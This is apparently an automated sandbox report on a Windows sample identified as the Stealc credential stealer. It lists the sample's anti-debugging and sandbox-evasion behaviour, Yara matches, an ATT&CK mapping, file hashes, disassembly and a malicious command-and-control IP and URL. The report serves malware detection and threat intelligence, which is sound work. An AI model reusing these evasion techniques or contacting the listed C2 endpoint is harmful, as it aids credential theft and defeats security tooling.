                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B40 second address: D46B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46E3C second address: D46E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC0 second address: D46FC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC5 second address: D46FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47503 second address: D47507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47507 second address: D4750D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4763D second address: D47643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47643 second address: D4767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F885CB97C9Ah 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F885CB97C96h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F885CB97CA8h 0x0000001c popad 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D477B7 second address: D477BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4922B second address: D49231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB8B second address: D4BB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB8F second address: D4BB95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BE5A second address: D4BE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BE68 second address: D4BE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BED1 second address: D4BEE8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CC87018h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jc 00007F885CC87016h 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BEE8 second address: D4BF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F885CB97CA7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802EC second address: 50802F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802F0 second address: 50802F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802F6 second address: 508032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, FF63h 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov bh, 39h 0x00000010 call 00007F885CC8701Ch 0x00000015 pop edx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F885CC8701Ch 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edi, ax 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7378F second address: C737A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AC1F4F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CECB09 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00874910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00874910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0086DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0086E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0086ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00874570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00874570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086F68A FindFirstFileA,0_2_0086F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00873EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00873EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0086F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0086DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0086BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00861160 GetSystemInfo,ExitProcess,0_2_00861160
                Source: file.exe, file.exe, 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2091709653.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                Source: file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13645
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13648
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13659
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13699
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13667
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008645C0 VirtualProtect ?,00000004,00000100,000000000_2_008645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00879860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879750 mov eax, dword ptr fs:[00000030h]0_2_00879750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008778E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_008778E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3448, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00879600
                Source: file.exe, file.exe, 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ok=Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00877B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00877980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00877850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00877A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.860000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.860000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37Ifile.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/5file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.2091709653.0000000001193000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpIfile.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1531601
                      Start date and time:2024-10-11 12:43:09 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 89
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      nU3dGuezsg.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      nU3dGuezsg.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.951280109490687
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'829'376 bytes
                      MD5:adde8b6ddcd55de3dde9f4ee627cc469
                      SHA1:880f68fbfe3320a5aa1114ce977b7ea532d1be11
                      SHA256:069c5ce1632725647ebe8ee55088da4f22f79f8d8922a72f70c35a87bbbc9764
                      SHA512:36f6678447ee2f204c8d15e1f9d568e5a47643bd60465fabb8cac43bc769474d8c44f94c73c08379fa34da45d46205984a1b602a0a5454518d97ff96ba172e86
                      SSDEEP:49152:e0Rp0/PavD8jJqF4Gg2uF09XyqrnlXgR:eKpaPavD8jcF4GFyqRXgR
                      TLSH:C88533288F6105A5CD5A44F526E3F65EC48E5CC8DAFC0B1B2BA95EBC464B30F321716B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xa93000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F885CB16ACAh
                      bswap eax
                      sbb eax, dword ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F885CB18AC5h
                      inc ecx
                      push bx
                      dec esi
                      dec ebp
                      das
                      xor al, 36h
                      dec edi
                      bound ecx, dword ptr [ecx+4Ah]
                      dec edx
                      insd
                      push edi
                      dec eax
                      dec eax
                      jbe 00007F885CB16B32h
                      push esi
                      dec edx
                      popad
                      je 00007F885CB16B2Bh
                      push edx
                      dec esi
                      jc 00007F885CB16B3Ah
                      cmp byte ptr [ebx], dh
                      push edx
                      jns 00007F885CB16B07h
                      or eax, 49674B0Ah
                      cmp byte ptr [edi+43h], dl
                      jnc 00007F885CB16B0Dh
                      bound eax, dword ptr [ecx+30h]
                      pop edx
                      inc edi
                      push esp
                      push 43473163h
                      aaa
                      push edi
                      dec esi
                      xor ebp, dword ptr [ebx+59h]
                      push edi
                      push edx
                      pop eax
                      je 00007F885CB16B17h
                      xor dl, byte ptr [ebx+2Bh]
                      popad
                      jne 00007F885CB16B0Ch
                      dec eax
                      dec ebp
                      jo 00007F885CB16B03h
                      xor dword ptr [edi], esi
                      inc esp
                      dec edx
                      dec ebp
                      jns 00007F885CB16B10h
                      insd
                      jnc 00007F885CB16B30h
                      aaa
                      inc esp
                      inc ecx
                      inc ebx
                      xor dl, byte ptr [ecx+4Bh]
                      inc edx
                      inc esp
                      bound esi, dword ptr [ebx]
                      or eax, 63656B0Ah
                      jno 00007F885CB16B18h
                      push edx
                      insb
                      js 00007F885CB16B31h
                      outsb
                      inc ecx
                      jno 00007F885CB16B12h
                      push ebp
                      inc esi
                      pop edx
                      xor eax, dword ptr [ebx+36h]
                      push eax
                      aaa
                      imul edx, dword ptr [ebx+58h], 4Eh
                      aaa
                      inc ebx
                      jbe 00007F885CB16B0Ch
                      dec ebx
                      js 00007F885CB16B03h
                      jne 00007F885CB16AF1h
                      push esp
                      inc bp
                      outsb
                      inc edx
                      popad
                      dec ebx
                      insd
                      dec ebp
                      inc edi
                      xor dword ptr [ecx+36h], esp
                      push 0000004Bh
                      sub eax, dword ptr [ebp+33h]
                      jp 00007F885CB16B1Ch
                      dec edx
                      xor bh, byte ptr [edx+56h]
                      bound eax, dword ptr [edi+66h]
                      jbe 00007F885CB16AFAh
                      dec eax
                      or eax, 506C720Ah
                      aaa
                      xor dword ptr fs:[ebp+62h], ecx
                      arpl word ptr [esi], si
                      inc esp
                      jo 00007F885CB16B33h

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
